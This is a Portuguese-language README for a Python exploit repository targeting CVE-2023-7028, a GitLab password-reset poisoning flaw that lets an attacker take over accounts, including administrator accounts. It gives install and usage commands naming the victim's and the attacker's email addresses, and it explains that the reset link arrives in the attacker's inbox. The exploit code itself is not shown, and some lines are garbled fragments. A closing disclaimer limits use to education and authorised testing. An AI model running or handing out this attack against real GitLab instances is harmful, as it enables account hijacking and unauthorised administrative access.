
Exploit em Python para CVE-2023-7028, abusando do envenenamento de redefinição de senha do GitLab para assumir contas, incluindo administradores, por meio de solicitações de e-mail personalizadas.
Este repositório contém um exploit para CVE-2023-7028, uma vulnerabilidade crítica no GitLab que permite a um invasor abusar da funcionalidade de redefinição de senha e assumir contas, incluindo contas de administrador.
/users/password no GitLabrequestspip install requests
python3 attack.py -u <gitlab_url> -t <target_email> -e <attacker_email>
Exemplo:
python3 attack.py -u http://example.com -t [email protected] -e [email protected]
O exploit enviará e-mails de redefinição de senha tanto para a vítima quanto para os endereços de e-mail do invasor. Uma vez executado com sucesso, verifique a caixa de entrada do invasor para um link de redefinição de senha.
root).Este exploit destina-se apenas a fins educacionais e de teste autorizado.
Use este código com responsabilidade. O acesso não autorizado a sistemas é ilegal.